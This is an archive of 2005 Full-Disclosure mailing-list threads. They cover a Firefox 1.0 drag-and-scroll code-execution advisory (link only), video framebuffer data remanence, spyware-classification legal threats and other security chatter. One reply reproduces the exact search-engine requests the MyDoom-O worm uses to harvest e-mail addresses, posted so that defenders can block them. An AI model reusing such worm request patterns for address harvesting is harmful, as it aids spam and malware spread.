2005-02-25 Thread Beauford, Jason
That sucked.

Fortunately:  http://www.mozilla.org/products/firefox/releases/

jmb

-Original Message-
From: mikx [mailto:[EMAIL PROTECTED] 
Sent: Friday, February 25, 2005 3:11 AM
To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: Firescrolling [Firefox 1.0]


__Summary

Remember my Internet Explorer "scrollbar exploit" based on http-equiv's
"What a Drag"? When will people ever learn that "unusual user interaction"
can be hidden by common tasks...

Let's combine fireflashing, firetabbing, xul and javascript to run
arbitrary code by dragging a scrollbar two times.

__Proof-of-Concept

http://www.mikx.de/firescrolling/

__Status

The exploit is based on multiple vulnerabilities:

bugzilla.mozilla.org #280664 (fireflashing) bugzilla.mozilla.org #280056
(firetabbing) bugzilla.mozilla.org #281807 (firescrolling)

Upgrade to Firefox 1.0.1 or disable javascript.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has 
assigned the name CAN-2005-0527 to this issue.

__Affected Software

Tested with Firefox 1.0 on Windows and Linux (Fedora Core)

__Contact Information

Michael Krax <[EMAIL PROTECTED]>
http://www.mikx.de/?p=11

mikx




[Full-Disclosure] Re: Xfree86 video buffering?

2005-02-25 Thread Stan Bubrouski
Riad S. Wahby wrote:
> Stan Bubrouski <[EMAIL PROTECTED]> wrote:
>
> > With this solution someone could intentionally crash your machine to
> > avoid those routines from running.  I'm not trying to put you down or
> > anything, in fact I probably know less about video related stuff than
> > most on the list, this just doesn't seem like the best way to do it.
> > I have no better suggestions, I'll leave this one to the experts.
>
> You've found a valid case where clear-on-shutdown breaks, but your
> solution doesn't solve the problem, it exacerbates it!

Umm I didn't offer a solution at all?  I clearly said I wasn't wise
enough to devise a solution for this... which is why I said I'll leave a
solution to the experts...

> Let's consider the threat here.
> - I'm looking at something sensitive on my screen.
> - I shut down my computer.
> ...some time passes...
> - Mallory boots my computer and reads out the buffers from my video
>   card, thereby obtaining the sensitive information.
> By your proposal, we _intentionally_ leave the data on the video card
> until Mallory already has access to the machine, trusting that he'll
> be stupid enough to load our clear-on-startup video card drivers before
> dumping out the framebuffer.

Can you read?  I didn't propose any solution, I just poked holes in
someone else's???

> The alternative, to clear-on-shutdown, is obviously better under
> normal circumstances, since sensitive data are never left in the
> framebuffer. In an exceptional case such as the computer crashing and
> failing to clear the framebuffer, it's true that the data remain on the
> card. Note, however, that we're in the same situation post-crash that
> we'd _always_ be in under your proposed system.

WHAT PROPOSED SYSTEM?

> It's obvious that clear-on-startup is strictly worse than clear-on-
> shutdown; implementing the latter will prevent a casual observer from
> seeing anything sensitive on the screen at startup, but it doesn't
> actually grant you any more security, since the data are still
> physically on the card.  Implementing both gives you a slight edge
> against a passive attacker in a small range of exceptional cases, so it
> might be the right way to do things.

I don't think things are that clear at all.  In fact I don't know that
ANYONE has actually fully explained the problem and why it is occurring
in the first place.

> Has anyone ever noticed this behavior with Windows, say, after a crash?
> I'm not saying I have (haven't actually run a Windows machine regularly
> in years, so I probably wouldn't remember anyway), I'm just curious.

I've never observed this problem during the 5 years I've used Windows
2000.  However, come to think of it, this problem isn't new.  I remember
back in '99 my old p166, which indeed used the vesa driver, did this too.
So umm it's probably been brought up many times before.

Please read things more carefully before responding.  All I did was
offer a lame hypothetical situation in which someone else's solution
wouldn't work.

-sb


[Full-Disclosure] Re: Xfree86 video buffering?

2005-02-25 Thread Stan Bubrouski
Riad S. Wahby wrote:
> Stan Bubrouski <[EMAIL PROTECTED]> wrote:
>
> > Umm I didn't offer a solution at all?
>
> Are you making a statement or asking a question?

Umm more like wondering what you're talking about.

> > I clearly said I wasn't wise enough to devise a solution for this...
> > which is why I said I'll leave a solution to the experts...
>
> It's fairly obvious that you either have to do it at shutdown or at
> startup.  When else are you going to do it, while the user is viewing
> the screen?

I wasn't making a case for either argument.

> Also, you seem to have taken my email as a personal attack.  Calm down,
> dude.  I was participating in a discussion, not holding up a giant "Stan
> is stupid" sign.

Go ahead and hold up a sign, doesn't bother me; if it did I wouldn't be
posting to public mailing lists.
But if you think I'm sitting here steaming about it you're barking up the
wrong tree :-P

I think you're simply inferring too much from what I'm saying.  That's all.

Best Regards,

sb


[Full-Disclosure] Re: Xfree86 video buffering?

2005-02-25 Thread Riad S. Wahby
Stan Bubrouski <[EMAIL PROTECTED]> wrote:
> Umm I didn't offer a solution at all? 

Are you making a statement or asking a question?

> I clearly said I wasn't wise enough to devise a solution for this...
> which is why I said I'll leave a solution to the experts...

It's fairly obvious that you either have to do it at shutdown or at
startup.  When else are you going to do it, while the user is viewing
the screen?

Also, you seem to have taken my email as a personal attack.  Calm down,
dude.  I was participating in a discussion, not holding up a giant "Stan
is stupid" sign.

-- 
Riad S. Wahby
[EMAIL PROTECTED]


[Full-Disclosure] RE: Firescrolling [Firefox 1.0]

2005-02-25 Thread Eric McCarty
Confirmed Exploit works in Firefox 1.0, however on a side note Microsoft
Anti-spyware prevented the script from executing.



Eric McCarty
Systems Administrator
Internet Security Officer


 

-Original Message-
From: mikx [mailto:[EMAIL PROTECTED] 
Sent: Friday, February 25, 2005 12:11 AM
To: full-disclosure@lists.netsys.com; bugtraq@securityfocus.com;
[EMAIL PROTECTED]
Subject: Firescrolling [Firefox 1.0]

__Summary

Remember my Internet Explorer "scrollbar exploit" based on http-equiv's
"What a Drag"? When will people ever learn that "unusual user interaction"
can be hidden by common tasks...

Let's combine fireflashing, firetabbing, xul and javascript to run
arbitrary code by dragging a scrollbar two times.

__Proof-of-Concept

http://www.mikx.de/firescrolling/

__Status

The exploit is based on multiple vulnerabilities:

bugzilla.mozilla.org #280664 (fireflashing) bugzilla.mozilla.org #280056
(firetabbing) bugzilla.mozilla.org #281807 (firescrolling)

Upgrade to Firefox 1.0.1 or disable javascript.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2005-0527 to this issue.

__Affected Software

Tested with Firefox 1.0 on Windows and Linux (Fedora Core)

__Contact Information

Michael Krax <[EMAIL PROTECTED]>
http://www.mikx.de/?p=11

mikx




[Full-Disclosure] Re: Xfree86 video buffering?

2005-02-25 Thread Riad S. Wahby
Stan Bubrouski <[EMAIL PROTECTED]> wrote:
> With this solution someone could intentionally crash your machine to
> avoid those routines from running.  I'm not trying to put you down or
> anything, in fact I probably know less about video related stuff than
> most on the list, this just doesn't seem like the best way to do it.
> I have no better suggestions, I'll leave this one to the experts.

You've found a valid case where clear-on-shutdown breaks, but your
solution doesn't solve the problem, it exacerbates it!

Let's consider the threat here.

- I'm looking at something sensitive on my screen.
- I shut down my computer.
...some time passes...
- Mallory boots my computer and reads out the buffers from my video
  card, thereby obtaining the sensitive information.

By your proposal, we _intentionally_ leave the data on the video card
until Mallory already has access to the machine, trusting that he'll
be stupid enough to load our clear-on-startup video card drivers before
dumping out the framebuffer.

The alternative, to clear-on-shutdown, is obviously better under
normal circumstances, since sensitive data are never left in the
framebuffer. In an exceptional case such as the computer crashing and
failing to clear the framebuffer, it's true that the data remain on the
card. Note, however, that we're in the same situation post-crash that
we'd _always_ be in under your proposed system.

It's obvious that clear-on-startup is strictly worse than clear-on-
shutdown; implementing the latter will prevent a casual observer from
seeing anything sensitive on the screen at startup, but it doesn't
actually grant you any more security, since the data are still
physically on the card.  Implementing both gives you a slight edge
against a passive attacker in a small range of exceptional cases, so it
might be the right way to do things.

Has anyone ever noticed this behavior with Windows, say, after a crash?
I'm not saying I have (haven't actually run a Windows machine regularly
in years, so I probably wouldn't remember anyway), I'm just curious.

-- 
Riad S. Wahby
[EMAIL PROTECTED]


[Full-Disclosure] Re: Xfree86 video buffering?

2005-02-25 Thread Riad S. Wahby
James Tucker <[EMAIL PROTECTED]> wrote:
> Is it not possible to switch processing modes without switching video modes?
> Could a fast(er) operation, such as a blank intermediate pallete be
> loaded to 'wash out' all coloured pixels on the screen?

It seems like worrying about this at startup is the wrong approach. If
I'm looking at a root prompt in X, I'm already trusting the entire video
infrastructure (card, driver, &c) to be secure to whatever extent I
require.  If my driver/card combo has this problem with failing to
explicitly clear video memory at shutdown, and if my solution is to make
sure that the video driver clears the buffer at _startup_, then I'm also
implicitly trusting the next piece of software that's going to touch
that particular framebuffer not to read it out and send it off to
{insert favorite TLA here}.

Why extend your trust to a driver over which you perhaps have no
control?  The driver that is displaying the sensitive data should have
the responsibility of clearing same from the video card's memory.  Any
other solution is only a quick hack; it'll prevent a casual observer
from seeing anything sensitive, but not a dedicated adversary.

-- 
Riad S. Wahby
[EMAIL PROTECTED]



[Full-Disclosure] RE: Incorrect Classification of iDownload's Product as Spyware...

2005-02-24 Thread Roger A. Grimes
I've got a solution for this litigation problem for the anti-spyware
companies.

Create a new classification called Recognized Software.  In the
description, tell end users that Recognized software contains both wanted
and unwanted software. The software is in this category because many
users consider it and its actions unwanted. 

Ok, not spyware, just unwanted recognized software.  Easy to prove in
court, not slander, no lawsuit. Let's not quibble over
name-calling...and get to the root of the intent. Does end-user want
this particular software to keep on being installed and used if it knew
its true actions?  

-Original Message-
From: Paul Laudanski [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, February 23, 2005 8:47 AM
To: bugtraq@securityfocus.com; full-disclosure@lists.netsys.com
Subject: Incorrect Classification of iDownload's Product as Spyware...

In a letter received by CastleCops from a law firm representing
iDownload/iSearch Toolbar:

http://castlecops.com/article-5762-nested-0-0.html

It has been found out that another website has received a similar form.

In the next link is our response, with more information on the other
website, Spyware Warrior Blog:

http://castlecops.com/article-5765-nested-0-0.html

Other security sites have picked up the story:

http://netrn.net/spywareblog/archives/2005/02/22/idownloads-product-is-not-malware/
http://www.dslreports.com/forum/remark,12733617%7Emode=flat
http://www.dslreports.com/shownews/60608
http://www.revenews.com/wayneporter/archives/000429.html
http://www.wilderssecurity.com/showthread.php?t=67648

--
Regards,

Paul Laudanski - Computer Cops, LLC.
CastleCops(SM) - http://castlecops.com
http://cuddlesnkisses.com | http://justalittlepoke.com |
http://zhen-xjell.com




[Full-Disclosure] Re: Incorrect Classification of iDownload's Product as Spyware...

2005-02-24 Thread Dave C
I frequent and read CC often and couldn't agree more. ISearch gets its 
hooks so far into a system that it can only be classed as the garbage 
spyware program that it is (IMHO).

Good job and good luck!

Paul Laudanski wrote:
> In a letter received by CastleCops from a law firm representing 
> iDownload/iSearch Toolbar:
>
> http://castlecops.com/article-5762-nested-0-0.html
>
> It has been found out that another website has received a similar form.  
> In the next link is our response, with more information on the other 
> website, Spyware Warrior Blog:
>
> http://castlecops.com/article-5765-nested-0-0.html
>
> Other security sites have picked up the story:
>
> http://netrn.net/spywareblog/archives/2005/02/22/idownloads-product-is-not-malware/
> http://www.dslreports.com/forum/remark,12733617%7Emode=flat
> http://www.dslreports.com/shownews/60608
> http://www.revenews.com/wayneporter/archives/000429.html
> http://www.wilderssecurity.com/showthread.php?t=67648


[Full-Disclosure] Re: But i guess.....

2005-02-23 Thread Stan Bubrouski
Tanvir wrote:
> Dear Stan,
>
> Hi. Thanks for answering.
>
> But I thought we are dealing here with security and I thought that the 
> view this camera presents is related to that.

Yes, but by default Axis cameras enable the world to access them.  This 
is not a security issue.

> You can click on either 2X or 4X button on the top left corner then 
> the picture will enlarge. It doesn't seem to me any coat hangers etc... 
> What it seems to me is like has captured something or someone and he is 
> keeping a look through this camera.

Looks to me like simply a security camera...nothing suspicious about it...

> That makes it a security issue. As many of you on the list are capable 
> of tracking that camera owner, or inform authorities about it. I am 
> sitting in Karachi Pakistan and can't do much from here.

Nobody will bother, there are literally thousands and thousands of Axis 
cameras all over the net...pick anything on that page and google it and 
you will find 1+ other cameras just like that one and you can zoom 
those too... but it's not a security issue...

> Warm regards, and thanks for your time.
>
> Tanvir.



[Full-Disclosure] Re: Incorrect Classification of iDownload's Product as Spyware...

2005-02-23 Thread Paul Laudanski
Thanks for the reply.  As an added note, Slashdot has also picked up the 
story:

http://yro.slashdot.org/yro/05/02/23/1830243.shtml?tid=158&tid=17

Doug Muth writes "According to this article over on DSL Reports, yet 
another spyware author, iDownload, has been sending out cease and desist 
letters to sites that classify their iSearch toolbar as Spyware. Some 
research reveals that yes, iSearch really does take over users' computers. 
A search on Spyware Guide also turns up a writeup on iSearch."

On Wed, 23 Feb 2005, Dave C wrote:

> I frequent and read CC often and couldn't agree more. ISearch gets its 
> hooks so far into a system that it can only be classed as the garbage 
> spyware program that it is (IMHO).
> 
> Good job and good luck!
> 
> Paul Laudanski wrote:
> > In a letter received by CastleCops from a law firm representing 
> > iDownload/iSearch Toolbar:
> > 
> > http://castlecops.com/article-5762-nested-0-0.html
> > 
> > It has been found out that another website has received a similar form.  
> > In the next link is our response, with more information on the other 
> > website, Spyware Warrior Blog:
> > 
> > http://castlecops.com/article-5765-nested-0-0.html
> > 
> > Other security sites have picked up the story:
> > 
> > http://netrn.net/spywareblog/archives/2005/02/22/idownloads-product-is-not-malware/
> > http://www.dslreports.com/forum/remark,12733617%7Emode=flat
> > http://www.dslreports.com/shownews/60608
> > http://www.revenews.com/wayneporter/archives/000429.html
> > http://www.wilderssecurity.com/showthread.php?t=67648

-- 
Regards,

Paul Laudanski - Computer Cops, LLC.
CastleCops(SM) - http://castlecops.com
http://cuddlesnkisses.com | http://justalittlepoke.com | http://zhen-xjell.com



[Full-Disclosure] RE: Incorrect Classification of iDownload's Product as Spyware...

2005-02-23 Thread Paul Kurczaba
Hi,
   Sometimes you can tell that there is a problem with a software product
when you type the name of it in Google and it comes back with the "Sponsored
Links" as "Remove [software name here]" :)

Check it out:
http://www.google.com/search?hl=en&q=isearch&btnG=Google+Search

-Paul

-Original Message-
From: Paul Laudanski [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, February 23, 2005 8:47 AM
To: bugtraq@securityfocus.com; full-disclosure@lists.netsys.com
Subject: Incorrect Classification of iDownload's Product as Spyware...

In a letter received by CastleCops from a law firm representing
iDownload/iSearch Toolbar:

http://castlecops.com/article-5762-nested-0-0.html

It has been found out that another website has received a similar form.  
In the next link is our response, with more information on the other
website, Spyware Warrior Blog:

http://castlecops.com/article-5765-nested-0-0.html

Other security sites have picked up the story:

http://netrn.net/spywareblog/archives/2005/02/22/idownloads-product-is-not-malware/
http://www.dslreports.com/forum/remark,12733617%7Emode=flat
http://www.dslreports.com/shownews/60608
http://www.revenews.com/wayneporter/archives/000429.html
http://www.wilderssecurity.com/showthread.php?t=67648

--
Regards,

Paul Laudanski - Computer Cops, LLC.
CastleCops(SM) - http://castlecops.com
http://cuddlesnkisses.com | http://justalittlepoke.com |
http://zhen-xjell.com





[Full-Disclosure] Re: Please can some one help out. (Off-topic)

2005-02-23 Thread Feher Tamas
>Can Some body tell me what is this?
>
>http://131.215.133.210/view/index.shtml?videos=one

The IP resolves to "DHCP-133-210.caltech.edu"

I guess it is a webcam scene from their DOOM3 experiments
laboratory (with idbehold L code applied). Higher education
is always fun ...

The only strange things are those coat-hangers in the
background (although those must be huge ones if they are
actually coat-hangers).

Regards: Tamas Feher.


[Full-Disclosure] [Full Disclosure] RE: this IS FUN!!!!

2005-02-22 Thread RandallM
Jordan wrote:

[Full-Disclosure] this is fun?
Jordan Klein haplo at haplo.net
Sun Feb 20 11:12:39 EST 2005

I wouldn't call that fun.  It took my system to 100% cpu usage, spawned a 
ton of windows, and eventually caused firefox to crash.  I guess that crash 
was firefox's built-in protection mechanism against this type of DoS.  :-)

I haven't tried this with popup blocking enabled, since this is my work 
machine, and I have to allow popups so our internal sites work.  (Damn, lazy

web developers...)

-- 
Jordan Klein ~  Beware of dragons
haplo at haplo.net  ~  for you are crunchy
UNIX System Administrator~  and go well with ketchup
- Original Message - 
From: "Christian" 
To: 
Cc: "Brandy Simon" 
Sent: Sunday, February 20, 2005 7:51 AM
Subject: Re: [Full-Disclosure] this is fun?

WOW! I had fun trying to capture the source page!!!

thank you
Randall M
 




Re: [Full-Disclosure] Re: Followup to T-Mobile hack

2005-02-22 Thread Andrew Smith
More info on the "hacking"

http://www.parishiltonsmobile.com/


On Tue, 22 Feb 2005 09:40:58 +0100 (CET), Feher Tamas
<[EMAIL PROTECTED]> wrote:
> >One top star reached Sunday morning expressed total outrage
> at Paris.
> 
> Is Dubya a star...?
> 
> (Maybe a shooting star. Won't last long.)
> 


-- 
zxy_rbt2


[Full-Disclosure] Re: this is fun

2005-02-22 Thread Feher Tamas
> http://picserv.on.zoy.org/IM39571.jpg

Detected as "not-virus:Joke.JS.Spawn.d" by Kaspersky AV.




[Full-Disclosure] Re: Followup to T-Mobile hack

2005-02-22 Thread Feher Tamas
>One top star reached Sunday morning expressed total outrage
at Paris.

Is Dubya a star...?

(Maybe a shooting star. Won't last long.)


[Full-Disclosure] Re: T-Mobil hacked - how?

2005-02-20 Thread gf gf
Ill Will,

Apparently my googling skills aren't up to par.  Mind
posting a link?

As an aside, I'd be shocked that they'd deploy an
architecture like that, brought down by a single point
of failure in a web server, without any defense in
depth.

--gf gf

xillwillx at gmail.com wrote:
> just like just about every other webserver gets hacked, they use third
> party server software that hasn't gone through enough rigorous testing
> to make sure it's not vulnerable to any flaws.. simple search on google
> will give you the answer





Re: [Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

2005-02-19 Thread Joachim Schipper
On Sat, Feb 19, 2005 at 09:45:30AM +1300, Nick FitzGerald wrote:
> Joachim Schipper to "Edge, Ronald D":
> 
> > > Funny. All I get is a blank white page. Could it be you are expecting me
> > > to trust your site, turn off all my defenses, turn on scripting, to view
> > > the page? You're kidding right, this is just a joke to test participants
> > > gullibility, right?
> > 
> > To be fair, it can be circumvented by just reading the source. However,
> > while Wetware/1.0 is a rather secure Javascript interpreter, it suffers
> > from lack of speed.
> 
> You too eh??
> 
> I think I need a processor upgrade on that machine...
> 
> 8-)
> 
> > In short, I gave up when I got another blank page after finding their
> > front page. Looks like the guys at iDEFENSE are not prepared for this
> > kind of paranoia...
> 
> Seems you need to upgrade to Wetware/1.01.  With that Wetware will 
> quickly note that the "trick" to navigating iDEFENSE's site is to add 
> "&flashstatus=true" or "&flashstatus=false" (the latter is probably 
> more generally preferable) to the end of its internal links, and that 
> this is readily achieved through the copy-and-paste functionality of 
> your operating system/environment...
> 
> 
> Regards,
> 
> Nick FitzGerald

This particular instance barfed with 'error 666-7: too much bother'.
Looks like I'm running a slightly unstable version...



Joachim


[Full-Disclosure] RE: [SA14304] Internet Explorer/Outlook Express Status Bar Spoofing -- A joke ?

2005-02-18 Thread bitlance winter
A joke ? ;-)
Secunia says,
"It is by default possible for script code to manipulate information 
displayed in the status bar. However, an error allows manipulation of the 
status bar without using any script code (e.g. in the "Restricted sites" 
zone)."

It is important that Outlook Express users may especially trust information 
displayed in
the status bar since HTML documents are viewed in context of the
"Restricted" zone, which has scripting support disabled.

REGARDS.
--
bitlance winter


Re: [Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

2005-02-18 Thread bkfsec
Nick FitzGerald wrote:
> Seems you need to upgrade to Wetware/1.01.  With that Wetware will 
> quickly note that the "trick" to navigating iDEFENSE's site is to add 
> "&flashstatus=true" or "&flashstatus=false" (the latter is probably 
> more generally preferable) to the end of its internal links, and that 
> this is readily achieved through the copy-and-paste functionality of 
> your operating system/environment...

It is important to note that Wetware/1.01 is only available on a minor 
subset of subgenus human.  Release notes and known bugs will be released 
shortly pending the end of my NDA with other parties to remain anonymous.

 -God

p.s.  This is a joke and not meant to offend anyone.  If you're 
offended, look in a mirror and repeat after me "I need to lighten up."




Re: [Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

2005-02-18 Thread Nick FitzGerald
Joachim Schipper to "Edge, Ronald D":

> > Funny. All I get is a blank white page. Could it be you are expecting me
> > to trust your site, turn off all my defenses, turn on scripting, to view
> > the page? You're kidding right, this is just a joke to test participants
> > gullibility, right?
> 
> To be fair, it can be circumvented by just reading the source. However,
> while Wetware/1.0 is a rather secure Javascript interpreter, it suffers
> from lack of speed.

You too eh??

I think I need a processor upgrade on that machine...

8-)

> In short, I gave up when I got another blank page after finding their
> front page. Looks like the guys at iDEFENSE are not prepared for this
> kind of paranoia...

Seems you need to upgrade to Wetware/1.01.  With that Wetware will 
quickly note that the "trick" to navigating iDEFENSE's site is to add 
"&flashstatus=true" or "&flashstatus=false" (the latter is probably 
more generally preferable) to the end of its internal links, and that 
this is readily achieved through the copy-and-paste functionality of 
your operating system/environment...


Regards,

Nick FitzGerald



Re: [Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

2005-02-18 Thread Nick FitzGerald
Edge, Ronald D wrote:

> Funny. All I get is a blank white page. Could it be you are expecting me
> to trust your site, turn off all my defenses, turn on scripting, to view
> the page? You're kidding right, this is just a joke to test participants
> gullibility, right?

Sarcasm noted, but that _is_ standard operating procedure for iDEFENSE.

As I have argued several times before, for example (sorry, URL will 
wrap):

http://lists.netsys.com/pipermail/full-disclosure/2005-
January/030971.html

it seems that at iDEFENSE, having a spiffy, bells-and-whistles website 
that is over-designed by folk with no security clue whatsoever is much 
more important than being a security company.  Now, even MS (at least 
after a bit of borax was poured on it) fixed their security bulletin 
pages so script-disabled browsers could view the entire contents of the 
page, but iDEFENSE steadfastly doesn't, so I guess we can all tell what 
that means about iDEFENSE's business focus.  (Read the above-linked 
item for a more detailed explication of all this.)


Regards,

Nick FitzGerald



Re: [Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

2005-02-18 Thread Joachim Schipper
On Fri, Feb 18, 2005 at 07:53:29AM -0500, Edge, Ronald D wrote:
> > Date: Thu, 17 Feb 2005 12:20:30 -0500
> > From: "iDEFENSE Labs" <[EMAIL PROTECTED]>
> > Subject: [Full-Disclosure] iDEFENSE Labs Website Launch
> > To: ,
> > <[EMAIL PROTECTED]>,
> > 
> > Message-ID:
> > <[EMAIL PROTECTED]>
> > Content-Type: text/plain;   charset="us-ascii"
> > 
> > iDEFENSE Labs is pleased to announce the launch of our community site:
> > 
> > http://labs.idefense.com
> 
> Funny. All I get is a blank white page. Could it be you are expecting me
> to trust your site, turn off all my defenses, turn on scripting, to view
> the page? You're kidding right, this is just a joke to test participants
> gullibility, right?
> 
> Ron.

To be fair, it can be circumvented by just reading the source. However,
while Wetware/1.0 is a rather secure Javascript interpreter, it suffers
from lack of speed.

In short, I gave up when I got another blank page after finding their
front page. Looks like the guys at iDEFENSE are not prepared for this
kind of paranoia...
 
Other than the fact it's not really accessible without enabling
Javascript, it might be a fine site, though.

Joachim


[Full-Disclosure] Re: iDEFENSE Labs Website Launch (iDEFENSE Labs)

2005-02-18 Thread Edge, Ronald D
> Date: Thu, 17 Feb 2005 12:20:30 -0500
> From: "iDEFENSE Labs" <[EMAIL PROTECTED]>
> Subject: [Full-Disclosure] iDEFENSE Labs Website Launch
> To: ,
>   <[EMAIL PROTECTED]>,
> 
> Message-ID:
>   <[EMAIL PROTECTED]>
> Content-Type: text/plain; charset="us-ascii"
> 
> iDEFENSE Labs is pleased to announce the launch of our community site:
> 
> http://labs.idefense.com

Funny. All I get is a blank white page. Could it be you are expecting me
to trust your site, turn off all my defenses, turn on scripting, to view
the page? You're kidding right, this is just a joke to test participants
gullibility, right?

Ron.

Ronald D. Edge
Director of Information Systems
Indiana University Intercollegiate Athletics
[EMAIL PROTECTED] (812)855-9010
http://iuhoosiers.com

The secret of life is honesty and fair dealing. 
If you can fake that, you've got it made. 
--Groucho Marx

 





[Full-Disclosure] RE: URLs used by W32/MyDoom-O (aka .AX, .BB) to query search engines?

2005-02-17 Thread Patrick Nolan
> -Original Message-
> From: [EMAIL PROTECTED] 
> Sent: Thursday, February 17, 2005 5:01 PM
> Subject: URLs used by W32/MyDoom-O (aka .AX,.BB) to query search engines?
> 
> Hello List,
> 
> Does anyone have a list of query URLs used by W32/MyDoom-O 
> (Sophos name: 
> http://www.sophos.com/virusinfo/analyses/w32mydoomo.html)
> to dig e-mail addresses from search engines?

Here are examples of the 4 URLs used by that virus, where %domain% is like
the comcast.net in my email address =>

#1 - www.altavista.com

GET /web/results?q=%domain%+email&kgs=0&kls=0&nbq=20 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.altavista.com
Connection: Keep-Alive

#2 - www.google.com

GET /search?hl=en&ie=UTF-8&oe=UTF-8&q=mailto+%domain%&num=100 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.google.com

#3 - Search.Lycos.com

GET /default.asp?lpv=1&loc=searchhp&tab=web&query=mailto+%domain% HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: search.lycos.com

#4 - search.yahoo.com

GET /search?p=email+ %domain% &ei=UTF-8&fr=fp-tab-web-t&cop=mss&tab= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: search.yahoo.com


> Are these specific enough that there's a chance to catch them 
> in the config of a web proxy (e.g. Squid) and avoid being 
> "blacklisted" by the search engines? (seems to me that Google 
> temporarily blacklists IPs that drown them under such requests)

You could use an IDP signature to block the requesting traffic.

> Greets,
> _Alain_

Regards, 

Patrick Nolan
Virus Researcher - Fortinet Inc.
http://www.fortinet.com 

To Submit A Virus:
pkzip/winzip password infected to
submitvirus at fortinet dot com

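The four request lines above are specific enough to be matched mechanically. As an added example (not code from the original post or from Fortinet), here is a small Python detector that applies the host, path and fixed-parameter shape of each request to Squid native-format access.log lines and flags only those whose search terms pair a harvesting keyword ("mailto" or "email") with a bare domain, which is the %domain% pattern the worm fills in. The log lines, client addresses and the example.com domain are constructed for the demonstration; the search-engine hosts, paths and parameter names come from the post.

```python
import re
from typing import Iterable, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Request shape per engine, taken from the four request lines quoted above:
# host -> (path, name of the search-terms parameter, parameters the worm always sends).
SIGNATURES = {
    "www.altavista.com": ("/web/results", "q", {"kgs", "kls", "nbq"}),
    "www.google.com": ("/search", "q", {"hl", "ie", "oe", "num"}),
    "search.lycos.com": ("/default.asp", "query", {"lpv", "loc", "tab"}),
    "search.yahoo.com": ("/search", "p", {"ei", "fr", "cop", "tab"}),
}

HARVEST_KEYWORDS = {"mailto", "email"}
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$", re.IGNORECASE)


def looks_like_harvest(terms: str) -> bool:
    """True when the decoded search terms pair a harvesting keyword with a bare
    domain, i.e. the '%domain% email' / 'mailto %domain%' shape of all four URLs."""
    tokens = terms.split()
    return (any(t.lower() in HARVEST_KEYWORDS for t in tokens)
            and any(DOMAIN_RE.match(t) for t in tokens))


def is_mydoom_query(url: str) -> bool:
    """Match one absolute URL against the per-engine signature."""
    parts = urlsplit(url)
    sig = SIGNATURES.get(parts.hostname or "")
    if sig is None:
        return False
    path, terms_param, fixed_params = sig
    if parts.path != path:
        return False
    # keep_blank_values: the Yahoo request carries an empty "tab=" parameter
    params = parse_qs(parts.query, keep_blank_values=True)
    if not fixed_params.issubset(params):
        return False
    return any(looks_like_harvest(v) for v in params.get(terms_param, []))


def scan_squid_log(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (client, url) for each matching Squid native-format access.log line.
    Native format: time elapsed client code/status bytes method URL ident hierarchy type."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        client, url = fields[2], fields[6]
        if is_mydoom_query(url):
            hits.append((client, url))
    return hits


# Constructed sample log: two infected clients (10.0.0.7, 10.0.0.9) plus ordinary browsing.
SAMPLE_LOG = """\
1108680000.123 45 10.0.0.7 TCP_MISS/200 1234 GET http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=mailto+example.com&num=100 - DIRECT/64.233.187.104 text/html
1108680001.456 50 10.0.0.7 TCP_MISS/200 2345 GET http://www.altavista.com/web/results?q=example.com+email&kgs=0&kls=0&nbq=20 - DIRECT/192.0.2.10 text/html
1108680002.789 30 10.0.0.9 TCP_MISS/200 3456 GET http://search.lycos.com/default.asp?lpv=1&loc=searchhp&tab=web&query=mailto+example.com - DIRECT/192.0.2.11 text/html
1108680003.000 30 10.0.0.9 TCP_MISS/200 4567 GET http://search.yahoo.com/search?p=email+%20example.com%20&ei=UTF-8&fr=fp-tab-web-t&cop=mss&tab= - DIRECT/192.0.2.12 text/html
1108680004.500 20 10.0.0.12 TCP_MISS/200 5678 GET http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=example.com+jobs&num=100 - DIRECT/64.233.187.104 text/html
1108680005.000 20 10.0.0.12 TCP_MISS/200 6789 GET http://www.google.com/search?hl=en&q=squid+acl+url_regex - DIRECT/64.233.187.104 text/html
""".splitlines()


if __name__ == "__main__":
    for client, url in scan_squid_log(SAMPLE_LOG):
        print(f"{client}  {url}")
```

Requiring the engine-specific fixed parameters as well as the keyword-plus-domain terms is what keeps a user's ordinary search for "example.com jobs" from being flagged. The same host/path/parameter shape can be expressed as a Squid url_regex ACL if the goal is to block at the proxy rather than to report from the log, which is what the original question asked about.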


Re: [Full-Disclosure] Re: Yahoo Problems?

2005-02-17 Thread Niek
On 2/17/2005 2:23 PM +0100, Macy Gasp wrote:
> Sometimes I can't believe how ignorant and stupid people can be. There
> are so many efficient AV products and still worms are running wild...
> :(
Imagine a world without ignorant people, and a worm free internet.
That would be bad for business and jobs.
Niek
--


Re: [Full-Disclosure] Re: Yahoo Problems?

2005-02-17 Thread Macy Gasp
On Thu, 17 Feb 2005 13:30:43 +0100 (CET), Feher Tamas
<[EMAIL PROTECTED]> wrote:

